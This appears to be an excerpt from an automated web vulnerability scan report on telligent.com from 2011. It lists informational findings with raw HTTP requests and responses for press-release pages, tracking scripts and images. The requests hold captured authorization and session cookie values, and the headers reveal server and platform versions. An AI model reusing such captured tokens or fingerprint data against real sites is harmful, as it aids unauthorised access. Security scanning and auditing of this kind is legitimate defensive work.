Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a19+GMT; expires=Sun, 26-Feb-2012 23:21:19 GMT; path=/
X-Pingback: http://telligent.com/company/news/b/articles/pingback.aspx
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:19 GMT
Connection: close
Content-Length: 55493


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.437. http://telligent.com/company/news/b/press_releases/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/news/b/press_releases/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx

Request

GET /company/news/b/press_releases/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a23+GMT; expires=Sun, 26-Feb-2012 23:21:23 GMT; path=/
X-Pingback: http://telligent.com/company/news/b/press_releases/pingback.aspx
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:23 GMT
Connection: close
Content-Length: 64463


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.438. http://telligent.com/company/news/b/press_releases/archive/2011/02/15/telligent-releases-integration-with-microsoft-sharepoint-2010.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/news/b/press_releases/archive/2011/02/15/telligent-releases-integration-with-microsoft-sharepoint-2010.aspx

Request

GET /company/news/b/press_releases/archive/2011/02/15/telligent-releases-integration-with-microsoft-sharepoint-2010.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a22+GMT; expires=Sun, 26-Feb-2012 23:21:22 GMT; path=/
X-Pingback: http://telligent.com/company/news/b/press_releases/pingback.aspx
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:22 GMT
Connection: close
Content-Length: 62062


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.439. http://telligent.com/company/news/b/teamblog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/news/b/teamblog/

Request

GET /company/news/b/teamblog/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a17+GMT; expires=Sun, 26-Feb-2012 23:21:17 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:17 GMT
Connection: close
Content-Length: 91340


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.440. http://telligent.com/company/news/b/teamblog/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /company/news/b/teamblog/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx

Request

GET /company/news/b/teamblog/archive/2011/02/10/new-customers-and-strong-demand-for-social-community-software-fuel-telligent-s-record-breaking-sales-quarter.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a18+GMT; expires=Sun, 26-Feb-2012 23:21:18 GMT; path=/
X-Pingback: http://telligent.com/company/news/b/teamblog/pingback.aspx
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:17 GMT
Connection: close
Content-Length: 49478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.441. http://telligent.com/customers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /customers.aspx

Request

GET /customers.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a55+GMT; expires=Sun, 26-Feb-2012 23:22:55 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:55 GMT
Connection: close
Content-Length: 62011


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.442. http://telligent.com/customers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /customers/

Request

GET /customers/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a27+GMT; expires=Sun, 26-Feb-2012 23:22:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:27 GMT
Connection: close
Content-Length: 62005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

7.443. http://telligent.com/elqNow/elqCfg.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /elqNow/elqCfg.js

Request

GET /elqNow/elqCfg.js HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 13 Jan 2009 21:23:00 GMT
Accept-Ranges: bytes
ETag: "012441cc575c91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT; expires=Sun, 26-Feb-2012 22:04:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:48 GMT
Content-Length: 3059

//------------------------------------------------------
// Copyright Eloqua Corporation.
//
var elqSiteID = '1137';
var elqVer = 'v200';
//
var elqERoot = 'now.eloqua.com/';
var elqSecERoot =
...[SNIP]...

7.444. http://telligent.com/elqNow/elqImg.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /elqNow/elqImg.js

Request

GET /elqNow/elqImg.js HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 13 Jan 2009 21:23:00 GMT
Accept-Ranges: bytes
ETag: "012441cc575c91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT; expires=Sun, 26-Feb-2012 22:04:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:48 GMT
Content-Length: 959

// Copyright Eloqua Corporation.
var elqWDt = new Date(20020101);
var elqDt = new Date();
var elqMs = elqDt.getMilliseconds();
var elqTzo = elqWDt.getTimezoneOffset();
var elqRef2 = '';
if (type
...[SNIP]...

7.445. http://telligent.com/elqNow/elqScr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /elqNow/elqScr.js

Request

GET /elqNow/elqScr.js HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 13 Jan 2009 21:23:00 GMT
Accept-Ranges: bytes
ETag: "012441cc575c91:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a48+GMT; expires=Sun, 26-Feb-2012 22:04:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:48 GMT
Content-Length: 416

// Copyright Eloqua Corporation.
var elqDt = new Date();
var elqMs = elqDt.getMilliseconds();
if ((typeof elqCurE != 'undefined') && (typeof elqPPS != 'undefined')){document.write('<SCR' + 'IPT TYP
...[SNIP]...

7.446. http://telligent.com/files/media/image/buttons/RequestDemoBtn.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /files/media/image/buttons/RequestDemoBtn.png

Request

GET /files/media/image/buttons/RequestDemoBtn.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Wed, 05 Jan 2011 16:23:23 GMT
Accept-Ranges: bytes
ETag: "c666ccdff4accb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a50+GMT; expires=Sun, 26-Feb-2012 22:04:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:50 GMT
Content-Length: 3007

.PNG
.
...IHDR.......".....v......tEXtSoftware.Adobe ImageReadyq.e<...aIDATx..]ol...{{>..>...m.TD.C.V%..J.*(.*RE..*nKP...*%.RQ.#..))..(TEJq.T."4.....C..(.n..`B..?....w....{......y..&.2?i.....7o
...[SNIP]...

7.447. http://telligent.com/files/media/image/buttons/RfpBtn.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /files/media/image/buttons/RfpBtn.png

Request

GET /files/media/image/buttons/RfpBtn.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Thu, 13 Jan 2011 05:28:37 GMT
Accept-Ranges: bytes
ETag: "1d3390bae2b2cb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a50+GMT; expires=Sun, 26-Feb-2012 22:04:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:50 GMT
Content-Length: 4144

.PNG
.
...IHDR.......".....v......sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....IDATx...kl..u...HZ.$...-.[8.,.E.~.j5E..[.(T..b.v.JF.m....b.k{......A.U.@..Vv.hT4..B.e...m
...[SNIP]...

7.448. http://telligent.com/files/media/image/buttons/TC-UpgradeBtn-56.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /files/media/image/buttons/TC-UpgradeBtn-56.png

Request

GET /files/media/image/buttons/TC-UpgradeBtn-56.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 05 Oct 2010 19:56:31 GMT
Accept-Ranges: bytes
ETag: "df7f267c764cb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a50+GMT; expires=Sun, 26-Feb-2012 22:04:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:50 GMT
Content-Length: 6828

.PNG
.
...IHDR.......=......c.f....sBIT.....O....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N...+IDATx...y\.G.._.9.3..."..!*..x .fE.bM.E....s.O]M~..5...zD7.Q1.I4.....5...0...r.- ..=.......
...[SNIP]...

7.449. http://telligent.com/files/media/image/products/community/social-ecosystem-tc-sb2.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /files/media/image/products/community/social-ecosystem-tc-sb2.png

Request

GET /files/media/image/products/community/social-ecosystem-tc-sb2.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Tue, 18 Jan 2011 00:28:08 GMT
Accept-Ranges: bytes
ETag: "1ba89d94a6b6cb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a50+GMT; expires=Sun, 26-Feb-2012 22:04:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:50 GMT
Content-Length: 71115

.PNG
.
...IHDR.............L.......sBIT....|.d....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N.. .IDATx...w...U......v.9s..H....
Y.-.l.!.-!..........J..@....@.[..B.....ml.F.,.X..h$.h.9gN{
...[SNIP]...

7.450. http://telligent.com/files/media/image/products/community/tc-people.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /files/media/image/products/community/tc-people.png

Request

GET /files/media/image/products/community/tc-people.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1850=; AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a44+GMT

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Thu, 13 Jan 2011 00:29:27 GMT
Accept-Ranges: bytes
ETag: "b716b6efb8b2cb1:0"
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a51+GMT; expires=Sun, 26-Feb-2012 22:04:51 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 22:04:51 GMT
Content-Length: 117065

.PNG
.
...IHDR.......3......|......sBIT....|.d....    pHYs...........~.....tEXtCreation Time.01/12/11A..8....tEXtSoftware.Adobe FireworksO..N.. .IDATx...I.l....[{..E....&_6.$.IV..,..@e..Ry"....g...z..?
...[SNIP]...

7.451. http://telligent.com/files/media/image/promos/Forrester-Promo-Best-Practices-Social-Technologies-250.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://telligent.com
Path:   /files/media/image/promos/Forrester-Promo-Best-Practices-Social-Technologies-250.png

Request

GET /files/media/image/promos/Forrester-Promo-Best-Practices-Social-Technologies-250.png HTTP/1.1
Host: telligent.com
Proxy-Connection: keep-alive
Referer: http://telligent.com/products/telligent_community/
Accept: */*
